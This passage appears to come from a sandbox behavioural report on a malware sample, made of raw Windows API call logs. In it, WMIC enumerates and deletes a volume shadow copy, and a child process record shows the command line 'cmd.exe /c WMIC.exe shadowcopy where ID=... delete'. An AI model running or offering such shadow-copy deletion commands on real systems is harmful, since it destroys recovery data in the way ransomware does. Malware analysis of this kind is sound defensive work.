TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x22f4d8 | out: TokenInformation=0x0, ReturnLength=0x22f4d8) returned 0 [0103.863] malloc (_Size=0x118) returned 0x15d080 [0103.863] GetTokenInformation (in: TokenHandle=0x27c, TokenInformationClass=0x3, TokenInformation=0x15d080, TokenInformationLength=0x118, ReturnLength=0x22f4d8 | out: TokenInformation=0x15d080, ReturnLength=0x22f4d8) returned 1 [0103.863] AdjustTokenPrivileges (in: TokenHandle=0x27c, DisableAllPrivileges=0, NewState=0x15d080*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=-261085885, Attributes=0xb9f6), (Luid.LowPart=0x0, Luid.HighPart=1429232, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0103.863] free (_Block=0x15d080) [0103.863] CloseHandle (hObject=0x27c) returned 1 [0103.863] lstrlenW (lpString="GET") returned 3 [0103.863] lstrlenW (lpString="delete") returned 6 [0103.863] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0103.863] lstrlenW (lpString="LIST") returned 4 [0103.863] lstrlenW (lpString="delete") returned 6 [0103.863] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0103.863] lstrlenW (lpString="SET") returned 3 [0103.863] lstrlenW (lpString="delete") returned 6 [0103.864] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0103.864] lstrlenW (lpString="CALL") returned 4 [0103.864] lstrlenW (lpString="delete") returned 6 [0103.864] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0103.864] lstrlenW (lpString="ASSOC") returned 5 [0103.864] lstrlenW (lpString="delete") returned 6 [0103.864] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0103.864] lstrlenW (lpString="CREATE") returned 6 [0103.864] lstrlenW (lpString="delete") returned 6 [0103.864] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0103.864] lstrlenW (lpString="DELETE") returned 6 [0103.864] lstrlenW (lpString="delete") returned 6 [0103.864] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0103.864] malloc (_Size=0x18) returned 0x15cc00 [0103.864] lstrlenA (lpString="") returned 0 [0103.864] malloc (_Size=0x2) returned 0x3fdfb0 [0103.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff3c314c, cbMultiByte=-1, lpWideCharStr=0x3fdfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0103.864] free (_Block=0x3fdfb0) [0103.864] malloc (_Size=0x18) returned 0x15cca0 [0103.864] lstrlenA (lpString="") returned 0 [0103.864] malloc (_Size=0x2) returned 0x3fdfb0 [0103.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff3c314c, cbMultiByte=-1, lpWideCharStr=0x3fdfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0103.865] free (_Block=0x3fdfb0) [0103.865] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0103.865] malloc (_Size=0x3e) returned 0x15d080 [0103.865] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0103.865] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff20 | out: _String="Select", _Context=0xffffffffffffff20) returned="Select" [0103.865] malloc (_Size=0x18) returned 0x15cba0 [0103.865] free (_Block=0x15cca0) [0103.865] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3f006e0007 | out: _String=0x0, _Context=0x3f006e0007) returned="*" [0103.865] lstrlenW (lpString="FROM") returned 4 [0103.865] lstrlenW (lpString="*") returned 1 [0103.865] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0103.865] malloc (_Size=0x18) returned 0x15cca0 [0103.865] free (_Block=0x15cba0) [0103.865] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x40006e0007 | out: _String=0x0, _Context=0x40006e0007) returned="from" [0103.865] lstrlenW (lpString="FROM") returned 4 [0103.865] lstrlenW (lpString="from") returned 4 [0103.865] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0103.865] malloc (_Size=0x18) returned 0x15cba0 [0103.865] free (_Block=0x15cca0) [0103.865] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x41006e0007 | out: _String=0x0, _Context=0x41006e0007) returned="Win32_ShadowCopy" [0103.866] malloc (_Size=0x18) returned 0x15cca0 [0103.866] free (_Block=0x15cba0) [0103.866] free (_Block=0x15d080) [0103.866] malloc (_Size=0x18) returned 0x15cba0 [0103.866] malloc (_Size=0x18) returned 0x15cc20 [0103.866] malloc (_Size=0x18) returned 0x15cc40 [0103.866] malloc (_Size=0x18) returned 0x15cc60 [0103.866] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0103.866] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0103.866] malloc (_Size=0x18) returned 0x15cc80 [0103.866] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy") returned 0x1e [0103.866] SysStringLen (param_1=" WHERE ") returned 0x7 [0103.866] malloc (_Size=0x18) returned 0x15ccc0 [0103.866] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy WHERE ") returned 0x25 [0103.866] SysStringLen (param_1="ID='{0F63D180-8A8A-41CF-8B3E-2852647AB192}'") returned 0x2b [0103.866] free (_Block=0x15cc00) [0103.867] free (_Block=0x15cc80) [0103.867] free (_Block=0x15cc60) [0103.867] free (_Block=0x15cc40) [0103.867] free (_Block=0x15cc20) [0103.867] free (_Block=0x15cba0) [0103.867] ??0CHString@@QEAA@XZ () returned 0x22f450 [0103.867] GetCurrentThreadId () returned 0xa0c [0103.867] malloc (_Size=0x18) returned 0x15cba0 [0103.867] malloc (_Size=0x18) returned 0x15cc20 [0103.867] malloc (_Size=0x18) returned 0x15cc40 [0103.867] malloc (_Size=0x18) returned 0x15cc60 [0103.867] malloc (_Size=0x18) returned 0x15cc80 [0103.867] SysStringLen (param_1="\\\\") returned 0x2 [0103.867] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0103.867] malloc (_Size=0x18) returned 0x15cc00 [0103.867] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb [0103.867] SysStringLen (param_1="\\") returned 0x1 [0103.868] malloc (_Size=0x18) returned 0x15cce0 [0103.868] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc [0103.868] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0103.868] free (_Block=0x15cc00) [0103.868] free (_Block=0x15cc80) [0103.868] free (_Block=0x15cc60) [0103.868] free (_Block=0x15cc40) [0103.868] free (_Block=0x15cc20) [0103.868] free (_Block=0x15cba0) [0103.868] malloc (_Size=0x18) returned 0x15cba0 [0103.868] malloc (_Size=0x18) returned 0x15cc20 [0103.868] malloc (_Size=0x18) returned 0x15cc40 [0103.868] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1ea1390, strNetworkResource="\\\\XDUWTFONO\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff4329d0 | out: ppNamespace=0xff4329d0*=0x1eb3c18) returned 0x0 [0103.875] free (_Block=0x15cc40) [0103.875] free (_Block=0x15cc20) [0103.875] free (_Block=0x15cba0) [0103.875] CoSetProxyBlanket (pProxy=0x1eb3c18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0103.876] free (_Block=0x15cce0) [0103.876] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0103.876] ??0CHString@@QEAA@XZ () returned 0x22f3a0 [0103.876] GetCurrentThreadId () returned 0xa0c [0103.876] malloc (_Size=0x18) returned 0x15cce0 [0103.876] lstrlenA (lpString="") returned 0 [0103.876] malloc (_Size=0x2) returned 0x3fdfb0 [0103.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff3c314c, cbMultiByte=-1, lpWideCharStr=0x3fdfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0103.876] free (_Block=0x3fdfb0) [0103.876] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy WHERE ID='{0F63D180-8A8A-41CF-8B3E-2852647AB192}'") returned 0x50 [0103.876] SysStringLen (param_1="") returned 0x0 [0103.876] free (_Block=0x15cce0) [0103.876] malloc (_Size=0x18) returned 0x15cce0 [0103.876] IWbemServices:ExecQuery (in: This=0x1eb3c18, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_ShadowCopy WHERE ID='{0F63D180-8A8A-41CF-8B3E-2852647AB192}'", lFlags=0, pCtx=0x0, ppEnum=0x22f3a8 | out: ppEnum=0x22f3a8*=0x1eb3d18) returned 0x0 [0103.930] free (_Block=0x15cce0) [0103.930] CoSetProxyBlanket (pProxy=0x1eb3d18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0103.933] IEnumWbemClassObject:Next (in: This=0x1eb3d18, lTimeout=-1, uCount=0x1, apObjects=0x22f3b0, puReturned=0x22f3c0 | out: apObjects=0x22f3b0*=0x1eb3d80, puReturned=0x22f3c0*=0x1) returned 0x0 [0103.934] malloc (_Size=0x18) returned 0x15cce0 [0103.934] IWbemClassObject:Get (in: This=0x1eb3d80, wszName="__PATH", lFlags=0, pVal=0x22f3d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x22f3d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{0F63D180-8A8A-41CF-8B3E-2852647AB192}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0103.934] free (_Block=0x15cce0) [0103.934] malloc (_Size=0x800) returned 0x15d080 [0103.934] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x15d080, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0103.934] FormatMessageW (in: dwFlags=0x2500, lpSource=0x15d080, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x22f2f8, nSize=0x0, Arguments=0x22f308 | out: lpBuffer="뚐7") returned 0x67 [0103.935] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{0F63D180-8A8A-41CF-8B3E-2852647AB192}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0103.935] malloc (_Size=0x68) returned 0x15d890 [0103.935] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{0F63D180-8A8A-41CF-8B3E-2852647AB192}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x15d890, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{0F63D180-8A8A-41CF-8B3E-2852647AB192}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0103.935] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff432ab0 [0103.935] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0103.935] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0103.935] free (_Block=0x15d890) [0103.935] free (_Block=0x15d080) [0103.935] LocalFree (hMem=0x37b690) returned 0x0 [0103.935] IWbemServices:DeleteInstance (in: This=0x1eb3c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{0F63D180-8A8A-41CF-8B3E-2852647AB192}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0105.076] IUnknown:Release (This=0x1eb3d80) returned 0x0 [0105.076] malloc (_Size=0x800) returned 0x15d080 [0105.076] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x15d080, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0105.076] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0105.076] malloc (_Size=0x20) returned 0x15cef0 [0105.076] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x15cef0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0105.076] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff432ab0 [0105.076] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0105.077] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0105.077] free (_Block=0x15cef0) [0105.077] free (_Block=0x15d080) [0105.077] IEnumWbemClassObject:Next (in: This=0x1eb3d18, lTimeout=-1, uCount=0x1, apObjects=0x22f3b0, puReturned=0x22f3c0 | out: apObjects=0x22f3b0*=0x0, puReturned=0x22f3c0*=0x0) returned 0x1 [0105.078] IUnknown:Release (This=0x1eb3d18) returned 0x0 [0105.080] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0105.080] free (_Block=0x15cca0) [0105.080] free (_Block=0x15ccc0) [0105.080] GetCurrentThreadId () returned 0xa0c [0105.080] ??0CHString@@QEAA@PEBG@Z () returned 0x22f588 [0105.080] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0x22f588 [0105.080] lstrlenW (lpString="LIST") returned 4 [0105.080] lstrlenW (lpString="delete") returned 6 [0105.080] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0105.080] lstrlenW (lpString="ASSOC") returned 5 [0105.080] lstrlenW (lpString="delete") returned 6 [0105.080] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0105.080] lstrlenW (lpString="GET") returned 3 [0105.080] lstrlenW (lpString="delete") returned 6 [0105.081] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0105.081] ??1CHString@@QEAA@XZ () returned 0x11702701 [0105.081] WbemLocator:IUnknown:Release (This=0x1eb3c18) returned 0x0 [0105.081] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0105.081] _kbhit () returned 0x0 [0105.082] free (_Block=0x156f20) [0105.082] free (_Block=0x15cac0) [0105.082] free (_Block=0x15caa0) [0105.082] free (_Block=0x15ca80) [0105.082] free (_Block=0x15ca60) [0105.082] free (_Block=0x1570a0) [0105.082] free (_Block=0x15cb40) [0105.082] free (_Block=0x1585c0) [0105.093] free (_Block=0x15d020) [0105.093] free (_Block=0x15cbc0) [0105.093] free (_Block=0x15cfa0) [0105.093] free (_Block=0x15cae0) [0105.093] free (_Block=0x15cbe0) [0105.093] free (_Block=0x157140) [0105.093] free (_Block=0x156e00) [0105.093] free (_Block=0x15cff0) [0105.093] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0105.094] free (_Block=0x15ce20) [0105.094] free (_Block=0x15cb00) [0105.094] free (_Block=0x15cb20) [0105.094] free (_Block=0x15cf30) [0105.094] free (_Block=0x15cb60) [0105.094] free (_Block=0x157ee0) [0105.094] free (_Block=0x157f30) [0105.094] free (_Block=0x157f80) [0105.094] free (_Block=0x15cb80) [0105.094] free (_Block=0x156a20) [0105.094] free (_Block=0x156de0) [0105.094] free (_Block=0x158040) [0105.094] free (_Block=0x156dc0) [0105.094] free (_Block=0x158000) [0105.094] free (_Block=0x156d60) [0105.094] free (_Block=0x156d80) [0105.095] free (_Block=0x156c40) [0105.095] free (_Block=0x156c60) [0105.095] free (_Block=0x156be0) [0105.095] free (_Block=0x156c00) [0105.095] free (_Block=0x156ca0) [0105.095] free (_Block=0x156cc0) [0105.095] free (_Block=0x156d00) [0105.095] free (_Block=0x156d20) [0105.095] free (_Block=0x156b20) [0105.095] free (_Block=0x156b40) [0105.095] free (_Block=0x156ac0) [0105.095] free (_Block=0x156ae0) [0105.095] free (_Block=0x156b80) [0105.095] free (_Block=0x156ba0) [0105.095] free (_Block=0x156a60) [0105.096] free (_Block=0x156a80) [0105.096] free (_Block=0x1569d0) [0105.096] free (_Block=0x1569a0) [0105.096] free (_Block=0x156e90) [0105.096] WbemLocator:IUnknown:Release (This=0x1ea1390) returned 0x2 [0105.096] WbemLocator:IUnknown:Release (This=0x1eb3b28) returned 0x0 [0105.096] WbemLocator:IUnknown:Release (This=0x1eb3a98) returned 0x0 [0105.097] WbemLocator:IUnknown:Release (This=0x1ea1390) returned 0x1 [0105.097] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0105.097] WbemLocator:IUnknown:Release (This=0x1ea1390) returned 0x0 [0105.097] free (_Block=0x15c9e0) [0105.097] free (_Block=0x15ca00) [0105.097] free (_Block=0x158540) [0105.097] free (_Block=0x15ca20) [0105.097] free (_Block=0x15ca40) [0105.097] free (_Block=0x158580) [0105.097] free (_Block=0x15c860) [0105.097] free (_Block=0x15c880) [0105.097] free (_Block=0x1583c0) [0105.098] free (_Block=0x15c8a0) [0105.098] free (_Block=0x15c8c0) [0105.098] free (_Block=0x158400) [0105.098] free (_Block=0x15c7e0) [0105.098] free (_Block=0x15c800) [0105.098] free (_Block=0x158340) [0105.098] free (_Block=0x15c820) [0105.098] free (_Block=0x15c840) [0105.098] free (_Block=0x158380) [0105.098] free (_Block=0x15c960) [0105.098] free (_Block=0x15c980) [0105.098] free (_Block=0x1584c0) [0105.098] free (_Block=0x15c9a0) [0105.098] free (_Block=0x15c9c0) [0105.098] free (_Block=0x158500) [0105.098] free (_Block=0x15c760) [0105.099] free (_Block=0x15c780) [0105.099] free (_Block=0x1582c0) [0105.099] free (_Block=0x15c7a0) [0105.099] free (_Block=0x15c7c0) [0105.099] free (_Block=0x158300) [0105.099] free (_Block=0x15c8e0) [0105.099] free (_Block=0x15c900) [0105.099] free (_Block=0x158440) [0105.099] free (_Block=0x15c920) [0105.099] free (_Block=0x15c940) [0105.099] free (_Block=0x158480) [0105.099] free (_Block=0x15c6a0) [0105.099] free (_Block=0x15c6c0) [0105.099] free (_Block=0x158200) [0105.100] free (_Block=0x15c560) [0105.100] free (_Block=0x15c580) [0105.100] free (_Block=0x1580c0) [0105.100] free (_Block=0x156e50) [0105.100] free (_Block=0x156e70) [0105.100] free (_Block=0x158080) [0105.100] free (_Block=0x15c5e0) [0105.100] free (_Block=0x15c600) [0105.100] free (_Block=0x158140) [0105.100] free (_Block=0x15c6e0) [0105.100] free (_Block=0x15c700) [0105.100] free (_Block=0x158240) [0105.100] free (_Block=0x15c5a0) [0105.100] free (_Block=0x15c5c0) [0105.101] free (_Block=0x158100) [0105.101] free (_Block=0x15c620) [0105.101] free (_Block=0x15c640) [0105.101] free (_Block=0x158180) [0105.101] free (_Block=0x15c660) [0105.101] free (_Block=0x15c680) [0105.101] free (_Block=0x1581c0) [0105.101] free (_Block=0x15c720) [0105.101] free (_Block=0x15c740) [0105.101] free (_Block=0x158280) [0105.101] CoUninitialize () [0105.122] exit (_Code=0) [0105.122] free (_Block=0x15cd30) [0105.122] free (_Block=0x157ea0) [0105.122] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0105.122] free (_Block=0x156f40) [0105.122] free (_Block=0x156a40) [0105.122] free (_Block=0x157e60) [0105.122] free (_Block=0x157e20) [0105.122] free (_Block=0x157dd0) [0105.122] free (_Block=0x157d90) [0105.122] free (_Block=0x157d30) [0105.122] free (_Block=0x155a90) [0105.122] free (_Block=0x155a50) [0105.122] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0105.122] free (_Block=0x15cec0) Thread: id = 180 os_tid = 0x9dc Thread: id = 181 os_tid = 0xb4c Thread: id = 182 os_tid = 0xaf0 Thread: id = 183 os_tid = 0xb6c Thread: id = 184 os_tid = 0xae8 Process: id = "30" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0xa008000" os_pid = "0xb0c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xaec" cmd_line = "cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}'\" delete" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 186 os_tid = 0x5b8 [0105.229] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2af9f0 | out: lpSystemTimeAsFileTime=0x2af9f0*(dwLowDateTime=0x464add10, dwHighDateTime=0x1d68245)) [0105.229] GetCurrentProcessId () returned 0xb0c [0105.229] GetCurrentThreadId () returned 0x5b8 [0105.229] GetTickCount () returned 0x114ffa4 [0105.229] QueryPerformanceCounter (in: lpPerformanceCount=0x2af9f8 | out: lpPerformanceCount=0x2af9f8*=22512182204) returned 1 [0105.231] GetModuleHandleW (lpModuleName=0x0) returned 0x4ab10000 [0105.231] __set_app_type (_Type=0x1) [0105.231] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4ab37810) returned 0x0 [0105.231] __getmainargs (in: _Argc=0x4ab5a608, _Argv=0x4ab5a618, _Env=0x4ab5a610, _DoWildCard=0, _StartInfo=0x4ab3e0f4 | out: _Argc=0x4ab5a608, _Argv=0x4ab5a618, _Env=0x4ab5a610) returned 0 [0105.231] GetCurrentThreadId () returned 0x5b8 [0105.231] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x5b8) returned 0x3c [0105.231] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0105.231] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0105.231] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0105.232] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0105.232] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2af988 | out: phkResult=0x2af988*=0x0) returned 0x2 [0105.232] VirtualQuery (in: lpAddress=0x2af970, lpBuffer=0x2af8f0, dwLength=0x30 | out: lpBuffer=0x2af8f0*(BaseAddress=0x2af000, AllocationBase=0x1b0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0105.232] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x2af8f0, dwLength=0x30 | out: lpBuffer=0x2af8f0*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0105.232] VirtualQuery (in: lpAddress=0x1b1000, lpBuffer=0x2af8f0, dwLength=0x30 | out: lpBuffer=0x2af8f0*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0105.232] VirtualQuery (in: lpAddress=0x1b4000, lpBuffer=0x2af8f0, dwLength=0x30 | out: lpBuffer=0x2af8f0*(BaseAddress=0x1b4000, AllocationBase=0x1b0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0105.232] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2af8f0, dwLength=0x30 | out: lpBuffer=0x2af8f0*(BaseAddress=0x2b0000, AllocationBase=0x2b0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xe000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0105.232] GetConsoleOutputCP () returned 0x1b5 [0105.232] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ab4bfe0 | out: lpCPInfo=0x4ab4bfe0) returned 1 [0105.232] SetConsoleCtrlHandler (HandlerRoutine=0x4ab33184, Add=1) returned 1 [0105.232] _get_osfhandle (_FileHandle=1) returned 0x7 [0105.232] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0105.233] _get_osfhandle (_FileHandle=1) returned 0x7 [0105.233] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ab3e194 | out: lpMode=0x4ab3e194) returned 1 [0105.233] _get_osfhandle (_FileHandle=1) returned 0x7 [0105.233] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0105.233] _get_osfhandle (_FileHandle=0) returned 0x3 [0105.233] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ab3e198 | out: lpMode=0x4ab3e198) returned 1 [0105.233] _get_osfhandle (_FileHandle=0) returned 0x3 [0105.233] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0105.233] GetEnvironmentStringsW () returned 0x488b90* [0105.234] GetProcessHeap () returned 0x470000 [0105.234] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xa7c) returned 0x489620 [0105.234] FreeEnvironmentStringsW (penv=0x488b90) returned 1 [0105.234] GetProcessHeap () returned 0x470000 [0105.234] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x8) returned 0x488a10 [0105.234] GetEnvironmentStringsW () returned 0x488b90* [0105.234] GetProcessHeap () returned 0x470000 [0105.234] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xa7c) returned 0x48a0b0 [0105.234] FreeEnvironmentStringsW (penv=0x488b90) returned 1 [0105.234] RegOpenKeyExW (in: hKey=0xffffffff80000002, 